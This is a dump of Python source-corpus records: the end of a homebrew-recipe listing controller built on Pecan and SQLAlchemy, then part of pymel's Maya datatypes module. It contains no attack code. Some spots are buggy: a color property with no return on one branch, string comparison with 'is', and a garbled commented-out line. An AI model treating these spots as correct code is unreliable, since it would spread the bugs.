@expose(template='recipes/browse/list.html')\n @with_form(RecipeSearchForm, validate_safe=True)\n def recipes(self, **kw):\n if request.pecan['form'].errors:\n abort(400)\n\n perpage = 25.0\n offset = int(perpage * (kw['page'] - 1))\n\n views = func.count(model.RecipeView.id).label('views')\n username = func.lower(model.User.username).label('username')\n\n sortable_type = case([\n (model.Recipe.type == 'MASH', literal('All Grain')),\n (model.Recipe.type == 'EXTRACT', literal('Extract')),\n (\n model.Recipe.type == 'EXTRACTSTEEP',\n literal('Extract w/ Steeped Grains')\n ),\n (model.Recipe.type == 'MINIMASH', literal('Mini-Mash')),\n ]).label('type')\n\n # map of columns\n column_map = dict(\n type=(sortable_type,),\n srm=(model.Recipe._srm,),\n name=(model.Recipe.name,),\n author=(username,),\n style=(model.Style.name,),\n last_updated=(model.Recipe.last_updated,),\n views=(views,)\n )\n\n # determine the sorting direction and column\n order_column = column_map.get(kw['order_by'])\n order_direction = dict(\n ASC=asc,\n DESC=desc\n ).get(kw['direction'])\n\n where = [\n model.Recipe.state == 'PUBLISHED'\n ]\n\n # If applicable, filter by style\n if kw['style']:\n query = where.append(model.Recipe.style == kw['style'])\n\n # If applicable, filter by type (MASH, etc...)\n where.append(or_(\n model.Recipe.id is None,\n model.Recipe.type == 'MASH' if kw['mash'] else None,\n model.Recipe.type == 'MINIMASH' if kw['minimash'] else None,\n model.Recipe.type.in_(('EXTRACTSTEEP', 'EXTRACT'))\n if kw['extract'] else None,\n ))\n\n # If applicable, filter by color\n if kw['color']:\n start, end = {\n 'light': (0, 8),\n 'amber': (8, 18),\n 'brown': (16, 25),\n 'dark': (25, 5000)\n }.get(kw['color'])\n\n where.append(and_(\n model.Recipe._srm >= start,\n model.Recipe._srm <= end,\n ))\n\n # Join the 
`recipe`, `recipeview`, `user`, and `style` tables\n from_obj = model.Recipe.table.outerjoin(\n model.RecipeView.table,\n onclause=model.RecipeView.recipe_id == model.Recipe.id\n ).outerjoin(\n model.Style.table,\n onclause=model.Recipe.style_id == model.Style.id\n ).join(\n model.User.table,\n onclause=model.Recipe.author_id == model.User.id\n )\n\n username_full = model.User.username.label('username')\n email = model.User.email.label('email')\n style_name = model.Style.name.label('style_name')\n style_url = model.Style.url.label('style_url')\n query = select(\n [\n model.Recipe.id,\n model.Recipe.name,\n model.Recipe._srm,\n username_full,\n email,\n sortable_type,\n style_name,\n style_url,\n model.Recipe.last_updated,\n views\n ],\n and_(*where),\n from_obj=[from_obj],\n group_by=model.Recipe.id\n )\n total = select(\n [func.count(model.Recipe.id)],\n and_(*where)\n ).execute().fetchone()[0]\n\n if views not in order_column:\n query = query.group_by(*order_column)\n\n query = query.group_by(username_full)\n query = query.group_by(email)\n query = query.group_by(style_name)\n query = query.group_by(style_url)\n\n recipes = query.order_by(\n *[order_direction(column) for column in order_column]\n ).offset(\n offset\n ).limit(\n perpage\n ).execute().fetchall()\n\n class RecipeProxy(object):\n\n def __init__(self, recipe):\n self.id, self.name, self._srm, self.username, self.email, self.printable_type, self.style_name, self.style_url, self.last_updated, self.views = recipe\n\n @property\n def metric_unit(self):\n return 'EBC' if request.context['metric'] is True else 'SRM'\n\n @property\n def color(self):\n if self.metric_unit is 'SRM':\n return self._srm\n round(self._srm * 1.97, 1)\n\n @property\n def gravatar(self):\n return 'https://www.gravatar.com/avatar/%s?d=https://draughtcraft.com/images/glass-square.png' % (\n md5(self.email.strip().lower()).hexdigest()\n )\n\n @property\n def url(self):\n return '/recipes/%s/' % (('%x' % self.id).lower())\n\n return dict(\n pages=max(1, int(ceil(total / perpage))),\n current_page=kw['page'],\n offset=offset,\n perpage=perpage,\n total=total,\n order_by=kw['order_by'],\n direction=kw['direction'],\n recipes=map(RecipeProxy, recipes)\n )\n\n create = RecipeCreationController()\n"} {"ext": "py", "sha": "1a301f14b2a1db234d1df5d719a51461f77c8d12", "content": "\"\"\"Data classes that are returned by functions within ``pymel.core``\n\nA wrap of Maya's Vector, Point, Color, Matrix, TransformationMatrix, Quaternion, EulerRotation types\n\"\"\"\n\nimport sys\nimport math\nimport copy\nimport operator\nimport colorsys\n\nimport pymel.util as util\nimport pymel.api as _api\nfrom pymel.util.arrays import *\nfrom pymel.util.arrays import _toCompOrArrayInstance\nimport pymel.internal.factories as _factories\n\n\n# patch some Maya api classes that miss __iter__ to make them iterable / convertible to list\ndef _patchMVector():\n def __len__(self):\n \"\"\" Number of components in the Maya api Vector, ie 3 \"\"\"\n return 3\n type.__setattr__(_api.MVector, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api Vector \"\"\"\n for i in xrange(len(self)):\n yield _api.MVector.__getitem__(self, i)\n type.__setattr__(_api.MVector, '__iter__', __iter__)\n\ndef _patchMFloatVector():\n def __len__(self):\n \"\"\" Number of components in the Maya api FloatVector, ie 3 \"\"\"\n return 3\n type.__setattr__(_api.MFloatVector, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api FloatVector 
\"\"\"\n for i in xrange(len(self)):\n yield _api.MFloatVector.__getitem__(self, i)\n type.__setattr__(_api.MFloatVector, '__iter__', __iter__)\n\ndef _patchMPoint():\n def __len__(self):\n \"\"\" Number of components in the Maya api Point, ie 4 \"\"\"\n return 4\n type.__setattr__(_api.MPoint, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api Point \"\"\"\n for i in xrange(len(self)):\n yield _api.MPoint.__getitem__(self, i)\n type.__setattr__(_api.MPoint, '__iter__', __iter__)\n\ndef _patchMFloatPoint():\n def __len__(self):\n \"\"\" Number of components in the Maya api FloatPoint, ie 4 \"\"\"\n return 4\n type.__setattr__(_api.MFloatPoint, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api FloatPoint \"\"\"\n for i in xrange(len(self)):\n yield _api.MFloatPoint.__getitem__(self, i)\n type.__setattr__(_api.MFloatPoint, '__iter__', __iter__)\n\ndef _patchMColor():\n def __len__(self):\n \"\"\" Number of components in the Maya api Color, ie 4 \"\"\"\n return 4\n type.__setattr__(_api.MColor, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api Color \"\"\"\n for i in xrange(len(self)):\n yield _api.MColor.__getitem__(self, i)\n type.__setattr__(_api.MColor, '__iter__', __iter__)\n\ndef _patchMMatrix():\n def __len__(self):\n \"\"\" Number of rows in the Maya api Matrix, ie 4.\n Not to be confused with the number of components (16) given by the size method \"\"\"\n return 4\n type.__setattr__(_api.MMatrix, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all 4 rows of a Maya api Matrix \"\"\"\n for r in xrange(4):\n yield Array([_api.MScriptUtil.getDoubleArrayItem(_api.MMatrix.__getitem__(self, r), c) for c in xrange(4)])\n type.__setattr__(_api.MMatrix, '__iter__', __iter__)\n\ndef _patchMFloatMatrix():\n def __len__(self):\n \"\"\" Number of rows in the Maya api FloatMatrix, ie 4.\n Not to be confused with the number of components (16) given by the size method \"\"\"\n return 4\n type.__setattr__(_api.MFloatMatrix, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all 4 rows of a Maya api FloatMatrix \"\"\"\n for r in xrange(4):\n yield Array([_api.MScriptUtil.getFloatArrayItem(_api.MFloatMatrix.__getitem__(self, r), c) for c in xrange(4)])\n type.__setattr__(_api.MFloatMatrix, '__iter__', __iter__)\n\ndef _patchMTransformationMatrix():\n def __len__(self):\n \"\"\" Number of rows in the Maya api Matrix, ie 4.\n Not to be confused with the number of components (16) given by the size method \"\"\"\n return 4\n type.__setattr__(_api.MTransformationMatrix, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all 4 rows of a Maya api TransformationMatrix \"\"\"\n return self.asMatrix().__iter__()\n type.__setattr__(_api.MTransformationMatrix, '__iter__', __iter__)\n\ndef _patchMQuaternion():\n def __len__(self):\n \"\"\" Number of components in the Maya api Quaternion, ie 4 \"\"\"\n return 4\n type.__setattr__(_api.MQuaternion, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of a Maya api Quaternion \"\"\"\n for i in xrange(len(self)):\n yield _api.MQuaternion.__getitem__(self, i)\n type.__setattr__(_api.MQuaternion, '__iter__', __iter__)\n\ndef _patchMEulerRotation():\n def __len__(self):\n \"\"\" Number of components in the Maya api EulerRotation, ie 3 \"\"\"\n return 3\n type.__setattr__(_api.MEulerRotation, '__len__', __len__)\n\n def __iter__(self):\n \"\"\" Iterates on all components of 
a Maya api EulerRotation \"\"\"\n for i in xrange(len(self)):\n yield _api.MEulerRotation.__getitem__(self, i)\n type.__setattr__(_api.MEulerRotation, '__iter__', __iter__)\n\n_patchMVector()\n_patchMFloatVector()\n_patchMPoint()\n_patchMFloatPoint()\n_patchMColor()\n_patchMMatrix()\n_patchMFloatMatrix()\n_patchMTransformationMatrix()\n_patchMQuaternion()\n_patchMEulerRotation()\n\n# the meta class of metaMayaWrapper\nclass MetaMayaArrayTypeWrapper(_factories.MetaMayaTypeWrapper):\n\n \"\"\" A metaclass to wrap Maya array type classes such as Vector, Matrix \"\"\"\n\n def __new__(mcl, classname, bases, classdict):\n \"\"\" Create a new wrapping class for a Maya api type, such as Vector or Matrix \"\"\"\n\n if 'shape' in classdict:\n # fixed shape means also fixed ndim and size\n shape = classdict['shape']\n ndim = len(shape)\n size = reduce(operator.mul, shape, 1)\n if 'ndim' not in classdict:\n classdict['ndim'] = ndim\n elif classdict['ndim'] != ndim:\n raise ValueError, \"class %s shape definition %s and number of dimensions definition %s do not match\" % (classname, shape, ndim)\n if 'size' not in classdict:\n classdict['size'] = size\n elif classdict['size'] != size:\n raise ValueError, \"class %s shape definition %s and size definition %s do not match\" % (classname, shape, size)\n\n # create the new class\n newcls = super(MetaMayaArrayTypeWrapper, mcl).__new__(mcl, classname, bases, classdict)\n\n try:\n apicls = newcls.apicls\n except:\n apicls = None\n try:\n shape = newcls.shape\n except:\n shape = None\n try:\n cnames = newcls.cnames\n except:\n cnames = ()\n\n if shape is not None:\n # fixed shape means also fixed ndim and size\n ndim = len(shape)\n size = reduce(operator.mul, shape, 1)\n\n if cnames:\n # definition for component names\n type.__setattr__(newcls, 'cnames', cnames)\n subsizes = [reduce(operator.mul, shape[i + 1:], 1) for i in xrange(ndim)]\n for index, compname in enumerate(cnames):\n coords = []\n for i in xrange(ndim):\n c = index // subsizes[i]\n index -= c * subsizes[i]\n coords.append(c)\n if len(coords) == 1:\n coords = coords[0]\n else:\n coords = tuple(coords)\n\n\n# def _get(self):\n# return self.__getitem__(coords)\n# _get.__name__ = '_get_' + compname\n#\n# # FIXME : the set property does not do anything in python 2.4 !!! 
It doesn't even get called.\n#\n# def _set(self, val):\n# self.__setitem__(coords, val)\n#\n# _set.__name__ = '_set_' + compname\n#\n# p = property( _get, _set, None, 'set and get %s component' % compname )\n\n cmd = \"property( lambda self: self.__getitem__(%s) , lambda self, val: self.__setitem__(%s,val) )\" % (coords, coords)\n p = eval(cmd)\n\n if compname not in classdict:\n type.__setattr__(newcls, compname, p)\n else:\n raise AttributeError, \"component name %s clashes with class method %r\" % (compname, classdict[compname])\n elif cnames:\n raise ValueError, \"can only define component names for classes with a fixed shape/size\"\n\n # constants for shape, ndim, size\n if shape is not None:\n type.__setattr__(newcls, 'shape', shape)\n if ndim is not None:\n type.__setattr__(newcls, 'ndim', ndim)\n if size is not None:\n type.__setattr__(newcls, 'size', size)\n #__slots__ = ['_data', '_shape', '_size']\n # add component names to read-only list\n readonly = newcls.__readonly__\n if hasattr(newcls, 'shape'):\n readonly['shape'] = None\n if hasattr(newcls, 'ndim'):\n readonly['ndim'] = None\n if hasattr(newcls, 'size'):\n readonly['size'] = None\n if 'cnames' not in readonly:\n readonly['cnames'] = None\n type.__setattr__(newcls, '__readonly__', readonly)\n\n# print \"created class\", newcls\n# print \"bases\", newcls.__bases__\n# print \"readonly\", newcls.__readonly__\n# print \"slots\", newcls.__slots__\n return newcls\n\n# generic math function that can operate on Arrays herited from arrays\n# (min, max, sum, prod...)\n\n# Functions that work on vectors will now be inherited from Array and properly defer\n# to the class methods\n\n\nclass Vector(VectorN):\n\n \"\"\"\n A 3 dimensional vector class that wraps Maya's api Vector class\n\n >>> from pymel.all import *\n >>> import pymel.core.datatypes as dt\n >>>\n >>> v = dt.Vector(1, 2, 3)\n >>> w = dt.Vector(x=1, z=2)\n >>> z = dt.Vector( dt.Vector.xAxis, z=1)\n\n >>> v = dt.Vector(1, 2, 3, unit='meters')\n >>> print v\n [1.0, 2.0, 3.0]\n \"\"\"\n __metaclass__ = MetaMayaArrayTypeWrapper\n __slots__ = ()\n # class specific info\n apicls = _api.MVector\n cnames = ('x', 'y', 'z')\n shape = (3,)\n unit = None\n\n def __new__(cls, *args, **kwargs):\n shape = kwargs.get('shape', None)\n ndim = kwargs.get('ndim', None)\n size = kwargs.get('size', None)\n # will default to class constant shape = (3,), so it's just an error check to catch invalid shapes,\n # as no other option is actually possible on Vector, but this method could be used to allow wrapping\n # of Maya array classes that can have a variable number of elements\n shape, ndim, size = cls._expandshape(shape, ndim, size)\n\n new = cls.apicls.__new__(cls)\n cls.apicls.__init__(new)\n return new\n\n def __init__(self, *args, **kwargs):\n \"\"\" __init__ method, valid for Vector, Point and Color classes \"\"\"\n cls = self.__class__\n\n if args:\n # allow both forms for arguments\n if len(args) == 1 and hasattr(args[0], '__iter__'):\n args = args[0]\n # shortcut when a direct api init is possible\n try:\n self.assign(args)\n except:\n # special exception to the rule that you cannot drop data in Arrays __init__\n # to allow all conversion from Vector derived classes (MPoint, MColor) to a base class\n # special case for MPoint to cartesianize if necessary\n # note : we may want to premultiply MColor by the alpha in a similar way\n if isinstance(args, _api.MPoint) and args.w != 1.0:\n args = copy.deepcopy(args).cartesianize()\n if isinstance(args, _api.MColor) and args.a != 1.0:\n # note : 
we may want to premultiply Color by the alpha in a similar way\n pass\n if isinstance(args, _api.MVector) or isinstance(args, _api.MPoint) or isinstance(args, _api.MColor):\n args = tuple(args)\n if len(args) > len(self):\n args = args[slice(self.shape[0])]\n super(Vector, self).__init__(*args)\n\n if hasattr(cls, 'cnames') and len(set(cls.cnames) & set(kwargs)):\n # can also use the form =\n l = list(self.flat)\n setcomp = False\n for i, c in enumerate(cls.cnames):\n if c in kwargs:\n if float(l[i]) != float(kwargs[c]):\n l[i] = float(kwargs[c])\n setcomp = True\n if setcomp:\n try:\n self.assign(l)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", cls.cnames, l))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (cls.__name__, msg, cls.__name__)\n\n # units handling\n self.unit = kwargs.get('unit', None)\n if self.unit is not None:\n self.assign([Distance(x, self.unit) for x in self])\n\n def __repr__(self):\n if hasattr(self, 'unit') and self.unit:\n return \"dt.%s(%s, unit='%s')\" % (self.__class__.__name__, str(self), self.unit)\n else:\n return \"dt.%s(%s)\" % (self.__class__.__name__, str(self))\n\n # for compatibility with base classes Array that actually hold a nested list in their _data attribute\n # here, there is no _data attribute as we subclass _api.MVector directly, thus v.data is v\n # for wraps\n\n def _getdata(self):\n return self.apicls(self)\n\n def _setdata(self, value):\n self.assign(value)\n\n def _deldata(self):\n if hasattr(self.apicls, 'clear'):\n self.apicls.clear(self)\n else:\n raise TypeError, \"cannot clear stored elements of %s\" % (self.__class__.__name__)\n\n data = property(_getdata, _setdata, _deldata, \"The Vector/FloatVector/Point/FloatPoint/Color data\")\n\n # overloads for assign and get though standard way should be to use the data property\n # to access stored values\n\n def assign(self, value):\n \"\"\" Wrap the Vector api assign method \"\"\"\n # don't accept instances as assign works on exact types\n if type(value) != self.apicls and type(value) != type(self):\n if not hasattr(value, '__iter__'):\n value = (value,)\n value = self.apicls(*value)\n self.apicls.assign(self, value)\n return self\n\n # API get, actually not faster than pulling self[i] for such a short structure\n def get(self):\n \"\"\" Wrap the Vector api get method \"\"\"\n # need to keep a ref to the MScriptUtil alive until\n # all pointers aren't needed...\n ms = _api.MScriptUtil()\n l = (0,) * self.size\n ms.createFromDouble(*l)\n p = ms.asDoublePtr()\n self.apicls.get(self, p)\n return tuple([ms.getDoubleArrayItem(p, i) for i in xrange(self.size)])\n\n def __len__(self):\n \"\"\" Number of components in the Vector instance, 3 for Vector, 4 for Point and Color \"\"\"\n return self.apicls.__len__(self)\n\n # __getitem__ / __setitem__ override\n\n # faster to override __getitem__ cause we know Vector only has one dimension\n def __getitem__(self, i):\n \"\"\" Get component i value from self \"\"\"\n if hasattr(i, '__iter__'):\n i = list(i)\n if len(i) == 1:\n i = i[0]\n else:\n raise IndexError, \"class %s instance %s has only %s dimension(s), index %s is out of bounds\" % (util.clsname(self), self, self.ndim, i)\n if isinstance(i, slice):\n return _toCompOrArrayInstance(list(self)[i], VectorN)\n try:\n return _toCompOrArrayInstance(list(self)[i], VectorN)\n except:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, 
i)\n else:\n if i < 0:\n i = self.size + i\n if i < self.size and not i < 0:\n if hasattr(self.apicls, '__getitem__'):\n return self.apicls.__getitem__(self, i)\n else:\n return list(self)[i]\n else:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n\n # as _api.Vector has no __setitem__ method, so need to reassign the whole Vector\n def __setitem__(self, i, a):\n \"\"\" Set component i value on self \"\"\"\n v = VectorN(self)\n v.__setitem__(i, a)\n self.assign(v)\n\n # iterator override\n\n # TODO : support for optional __iter__ arguments\n def __iter__(self, *args, **kwargs):\n \"\"\" Iterate on the api components \"\"\"\n return self.apicls.__iter__(self.data)\n\n def __contains__(self, value):\n \"\"\" True if at least one of the vector components is equal to the argument \"\"\"\n return value in self.__iter__()\n\n # common operators without an api equivalent are herited from VectorN\n\n # operators using the Maya API when applicable, but that can delegate to VectorN\n\n def __eq__(self, other):\n \"\"\" u.__eq__(v) <==> u == v\n Equivalence test \"\"\"\n try:\n return bool(self.apicls.__eq__(self, other))\n except Exception:\n return bool(super(Vector, self).__eq__(other))\n\n def __ne__(self, other):\n \"\"\" u.__ne__(v) <==> u != v\n Equivalence test \"\"\"\n return (not self.__eq__(other))\n\n def __neg__(self):\n \"\"\" u.__neg__() <==> -u\n The unary minus operator. Negates the value of each of the components of u \"\"\"\n return self.__class__(self.apicls.__neg__(self))\n\n def __add__(self, other):\n \"\"\" u.__add__(v) <==> u+v\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" u.__radd__(v) <==> v+u\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" u.__iadd__(v) <==> u += v\n In place addition of u and v, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except Exception:\n return NotImplemented\n\n def __sub__(self, other):\n \"\"\" u.__sub__(v) <==> u-v\n Returns the result of the substraction of v from u if v is convertible to a VectorN (element-wise substration),\n substract v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__sub__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__sub__(other))\n\n def __rsub__(self, other):\n \"\"\" u.__rsub__(v) <==> v-u\n Returns the result of the substraction of u from v if v is convertible to a VectorN (element-wise substration),\n replace every component c of u by v-c if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rsub__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__rsub__(other))\n\n def __isub__(self, other):\n \"\"\" u.__isub__(v) <==> u -= v\n In place substraction of u and v, see __sub__ \"\"\"\n try:\n return 
self.__class__(self.__sub__(other))\n except Exception:\n return NotImplemented\n\n def __div__(self, other):\n \"\"\" u.__div__(v) <==> u/v\n Returns the result of the division of u by v if v is convertible to a VectorN (element-wise division),\n divide every component of u by v if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__div__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__div__(other))\n\n def __rdiv__(self, other):\n \"\"\" u.__rdiv__(v) <==> v/u\n Returns the result of of the division of v by u if v is convertible to a VectorN (element-wise division),\n invert every component of u and multiply it by v if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rdiv__(self, other))\n except Exception:\n return self.__class__._convert(super(Vector, self).__rdiv__(other))\n\n def __idiv__(self, other):\n \"\"\" u.__idiv__(v) <==> u /= v\n In place division of u by v, see __div__ \"\"\"\n try:\n return self.__class__(self.__div__(other))\n except Exception:\n return NotImplemented\n # action depends on second object type\n\n def __mul__(self, other):\n \"\"\" u.__mul__(v) <==> u*v\n The multiply '*' operator is mapped to the dot product when both objects are Vectors,\n to the transformation of u by matrix v when v is a MatrixN,\n to element wise multiplication when v is a sequence,\n and multiplies each component of u by v when v is a numeric type. \"\"\"\n try:\n res = self.apicls.__mul__(self, other)\n assert res is not NotImplemented\n except Exception:\n res = super(Vector, self).__mul__(other)\n if util.isNumeric(res) or res is NotImplemented:\n return res\n else:\n return self.__class__._convert(res)\n\n def __rmul__(self, other):\n \"\"\" u.__rmul__(v) <==> v*u\n The multiply '*' operator is mapped to the dot product when both objects are Vectors,\n to the left side multiplication (pre-multiplication) of u by matrix v when v is a MatrixN,\n to element wise multiplication when v is a sequence,\n and multiplies each component of u by v when v is a numeric type. 
\"\"\"\n try:\n res = self.apicls.__rmul__(self, other)\n except:\n res = super(Vector, self).__rmul__(other)\n if util.isNumeric(res):\n return res\n else:\n return self.__class__._convert(res)\n\n def __imul__(self, other):\n \"\"\" u.__imul__(v) <==> u *= v\n Valid for Vector * Matrix multiplication, in place transformation of u by Matrix v\n or Vector by scalar multiplication only \"\"\"\n try:\n return self.__class__(self.__mul__(other))\n except:\n return NotImplemented\n # special operators\n\n def __xor__(self, other):\n \"\"\" u.__xor__(v) <==> u^v\n Defines the cross product operator between two 3D vectors,\n if v is a MatrixN, u^v is equivalent to u.transformAsNormal(v) \"\"\"\n if isinstance(other, VectorN):\n return self.cross(other)\n elif isinstance(other, MatrixN):\n return self.transformAsNormal(other)\n else:\n return NotImplemented\n\n def __ixor__(self, other):\n \"\"\" u.__xor__(v) <==> u^=v\n Inplace cross product or transformation by inverse transpose of v is v is a MatrixN \"\"\"\n try:\n return self.__class__(self.__xor__(other))\n except:\n return NotImplemented\n\n # wrap of other API MVector methods, we use the api method if possible and delegate to Vector else\n\n def isEquivalent(self, other, tol=None):\n \"\"\" Returns true if both arguments considered as Vector are equal within the specified tolerance \"\"\"\n if tol is None:\n tol = _api.MVector_kTol\n try:\n nself, nother = coerce(self, other)\n except:\n return False\n if isinstance(nself, Vector):\n return bool(nself.apicls.isEquivalent(nself, nother, tol))\n else:\n return bool(super(Vector, nself).isEquivalent(nother, tol))\n\n def isParallel(self, other, tol=None):\n \"\"\" Returns true if both arguments considered as Vector are parallel within the specified tolerance \"\"\"\n if tol is None:\n tol = _api.MVector_kTol\n try:\n return bool(self.apicls.isParallel(Vector(self), Vector(other), tol))\n except:\n return super(Vector, self).isParallel(other, tol)\n\n def distanceTo(self, other):\n try:\n return self.apicls.distanceTo(Point(self), Point(other))\n except:\n return super(Vector, self).dist(other)\n\n def length(self):\n \"\"\" Return the length of the vector \"\"\"\n return Vector.apicls.length(Vector(self))\n\n def sqlength(self):\n \"\"\" Return the square length of the vector \"\"\"\n return self.dot(self)\n\n def normal(self):\n \"\"\" Return a normalized copy of self \"\"\"\n return self.__class__(Vector.apicls.normal(Vector(self)))\n\n def normalize(self):\n \"\"\" Performs an in place normalization of self \"\"\"\n if type(self) is Vector:\n Vector.apicls.normalize(self)\n else:\n self.assign(self.normal())\n\n # additional api methods that work on Vector only, and don't have an equivalent on VectorN\n\n def rotateTo(self, other):\n \"\"\" u.rotateTo(v) --> Quaternion\n Returns the Quaternion that represents the rotation of the Vector u into the Vector v\n around their mutually perpendicular axis. 
It amounts to rotate u by angle(u, v) around axis(u, v) \"\"\"\n if isinstance(other, Vector):\n return Quaternion(Vector.apicls.rotateTo(Vector(self), Vector(other)))\n else:\n raise TypeError, \"%r is not a Vector instance\" % other\n\n def rotateBy(self, *args):\n \"\"\" u.rotateBy(*args) --> Vector\n Returns the result of rotating u by the specified arguments.\n There are several ways the rotation can be specified:\n args is a tuple of one Matrix, TransformationMatrix, Quaternion, EulerRotation\n arg is tuple of 4 arguments, 3 rotation value and an optionnal rotation order\n args is a tuple of one Vector, the axis and one float, the angle to rotate around that axis in radians\"\"\"\n if args:\n if len(args) == 2 and isinstance(args[0], Vector):\n return self.__class__(self.apicls.rotateBy(self, Quaternion(Vector(args[0]), float(args[1]))))\n elif len(args) == 1 and isinstance(args[0], Matrix):\n return self.__class__(self.apicls.rotateBy(self, args[0].rotate))\n else:\n return self.__class__(self.apicls.rotateBy(self, EulerRotation(unit='radians', *args)))\n else:\n return self\n\n# def asUnit(self, unit) :\n# #kUnit = Distance.kUnit(unit)\n# return self.__class__( [ Distance(x).asUnit(unit) for x in self ] )\n#\n# def asUnit(self) :\n# return self.asUnit(self.unit)\n#\n# def asUIUnit()nits()self) :\n# return self.asUnit(Distance.getUIUnit())\n#\n# def asInternalUnit(self) :\n# return self.asUnit(Distance.getInternalUnit())\n#\n# def asMillimeter(self) :\n# return self.asUnit('millimeter')\n# def asCentimeters(self) :\n# return self.asUnit('centimeters')\n# def asKilometers(self) :\n# return self.asUnit('kilometers')\n# def asMeters(self) :\n# return self.asUnit('meters')\n#\n# def asInches(self) :\n# return self.asUnit('inches')\n# def asFeet(self) :\n# return self.asUnit('feet')\n# def asYards(self) :\n# return self.asUnit('yards')\n# def asMiles(self) :\n# return self.asUnit('miles')\n\n # additional api methods that work on Vector only, but can also be delegated to VectorN\n\n def transformAsNormal(self, other):\n \"\"\" Returns the vector transformed by the matrix as a normal\n Normal vectors are not transformed in the same way as position vectors or points.\n If this vector is treated as a normal vector then it needs to be transformed by\n post multiplying it by the inverse transpose of the transformation matrix.\n This method will apply the proper transformation to the vector as if it were a normal. 
\"\"\"\n if isinstance(other, Matrix):\n return self.__class__._convert(Vector.apicls.transformAsNormal(Vector(self), Matrix(other)))\n else:\n return self.__class__._convert(super(Vector, self).transformAsNormal(other))\n\n def dot(self, other):\n \"\"\" dot product of two vectors \"\"\"\n if isinstance(other, Vector):\n return Vector.apicls.__mul__(Vector(self), Vector(other))\n else:\n return super(Vector, self).dot(other)\n\n def cross(self, other):\n \"\"\" cross product, only defined for two 3D vectors \"\"\"\n if isinstance(other, Vector):\n return self.__class__._convert(Vector.apicls.__xor__(Vector(self), Vector(other)))\n else:\n return self.__class__._convert(super(Vector, self).cross(other))\n\n def axis(self, other, normalize=False):\n \"\"\" u.axis(v) <==> angle(u, v) --> Vector\n Returns the axis of rotation from u to v as the vector n = u ^ v\n if the normalize keyword argument is set to True, n is also normalized \"\"\"\n if isinstance(other, Vector):\n if normalize:\n return self.__class__._convert(Vector.apicls.__xor__(Vector(self), Vector(other)).normal())\n else:\n return self.__class__._convert(Vector.apicls.__xor__(Vector(self), Vector(other)))\n else:\n return self.__class__._convert(super(Vector, self).axis(other, normalize))\n\n def angle(self, other):\n \"\"\" u.angle(v) <==> angle(u, v) --> float\n Returns the angle (in radians) between the two vectors u and v\n Note that this angle is not signed, use axis to know the direction of the rotation \"\"\"\n if isinstance(other, Vector):\n return Vector.apicls.angle(Vector(self), Vector(other))\n else:\n return super(Vector, self).angle(other)\n\n # methods without an api equivalent\n\n # cotan on MVectors only takes 2 arguments\n def cotan(self, other):\n \"\"\" u.cotan(v) <==> cotan(u, v) --> float :\n cotangent of the a, b angle, a and b should be MVectors\"\"\"\n return VectorN.cotan(self, other)\n\n # rest derived from VectorN class\n\nclass FloatVector(Vector):\n\n \"\"\" A 3 dimensional vector class that wraps Maya's api FloatVector class,\n It behaves identically to Vector, but it also derives from api's FloatVector\n to keep api methods happy\n \"\"\"\n apicls = _api.MFloatVector\n\n# Point specific functions\n\ndef planar(p, *args, **kwargs):\n \"\"\" planar(p[, q, r, s (...), tol=tolerance]) --> bool\n Returns True if all provided MPoints are planar within given tolerance \"\"\"\n if not isinstance(p, Point):\n try:\n p = Point(p)\n except:\n raise TypeError, \"%s is not convertible to type Point, planar is only defined for n MPoints\" % (util.clsname(p))\n return p.planar(*args, **kwargs)\ndef center(p, *args):\n \"\"\" center(p[, q, r, s (...)]) --> Point\n Returns the Point that is the center of p, q, r, s (...) \"\"\"\n if not isinstance(p, Point):\n try:\n p = Point(p)\n except:\n raise TypeError, \"%s is not convertible to type Point, center is only defined for n MPoints\" % (util.clsname(p))\n return p.center(*args)\ndef bWeights(p, *args):\n \"\"\" bWeights(p[, p0, p1, (...), pn]) --> tuple\n Returns a tuple of (n0, n1, ...) normalized barycentric weights so that n0*p0 + n1*p1 + ... 
